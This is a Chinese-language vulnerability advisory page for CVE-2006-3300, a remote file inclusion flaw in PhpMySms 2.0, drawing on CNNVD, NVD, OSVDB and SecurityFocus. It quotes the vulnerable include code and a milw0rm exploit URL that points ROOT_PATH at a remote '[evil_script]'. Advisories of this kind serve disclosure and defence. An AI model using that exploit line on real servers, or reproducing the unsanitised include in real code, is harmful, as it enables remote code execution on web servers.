CVE-2006-3300
CVSS7.5
发布时间 :2006-06-28 21:05:00
修订时间 :2011-03-07 21:38:18
NMCOES    

[原文]PHP remote file inclusion vulnerability in sms_config/gateway.php in PhpMySms 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the ROOT_PATH parameter.


[CNNVD]PHPMySMS gateway.php 远程文件包含漏洞(CNNVD-200606-551)

        PHPMySMS是一款开放源码的用PHP实现的基于Web的短信解决方案。
        PHPMySMS的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        远程攻击者可以利用PHPMySMS的gateway.php文件中的远程文件包含漏洞执行任意PHP代码。漏洞代码如下:
        ==============================================================
        if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
        include ("config.php");
        } else {
        include ("$ROOT_PATH/config.php");
        }
        ==============================================================
        
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3300
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3300
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-551
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27372
(UNKNOWN)  XF  phpmysms-gateway-file-include(27372)
http://www.vupen.com/english/advisories/2006/2590
(UNKNOWN)  VUPEN  ADV-2006-2590
http://www.securityfocus.com/bid/18633
(UNKNOWN)  BID  18633
http://secunia.com/advisories/20799
(UNKNOWN)  SECUNIA  20799
http://www.osvdb.org/26885
(UNKNOWN)  OSVDB  26885
http://milw0rm.com/exploits/1948
(UNKNOWN)  MILW0RM  1948

- 漏洞信息

PHPMySMS gateway.php 远程文件包含漏洞
高危 输入验证
2006-06-28 00:00:00 2006-07-21 00:00:00
远程  
        PHPMySMS是一款开放源码的用PHP实现的基于Web的短信解决方案。
        PHPMySMS的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        远程攻击者可以利用PHPMySMS的gateway.php文件中的远程文件包含漏洞执行任意PHP代码。漏洞代码如下:
        ==============================================================
        if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
        include ("config.php");
        } else {
        include ("$ROOT_PATH/config.php");
        }
        ==============================================================
        
        

- 公告与补丁

        暂无数据

- 漏洞信息 (1948)

phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability (EDBID:1948)
php webapps
2006-06-24 Verified
0 Persian-Defacer
N/A [点击下载]
PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
www.Hacking-Boys.com
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

# milw0rm.com [2006-06-24]
		

- 漏洞信息

26885
phpMySms gateway.php ROOT_PATH Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

phpMySms contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to gateway.php not properly sanitizing user input supplied to the 'ROOT_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-06-24 Unknow
2006-06-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

PHPMySMS Gateway.PHP Remote File Include Vulnerability
Input Validation Error 18633
Yes No
2006-06-24 12:00:00 2007-07-06 07:47:00
Persian-Defacer is credited with the discovery of this vulnerability.

- 受影响的程序版本

PhpMySms PhpMySms 2.0

- 漏洞讨论

phpMySms is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

phpMySms 2.0 is vulnerable to this issue; other versions may also be affected.

- 漏洞利用

This issue can be exploited through a browser.

The following exploit URI example is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站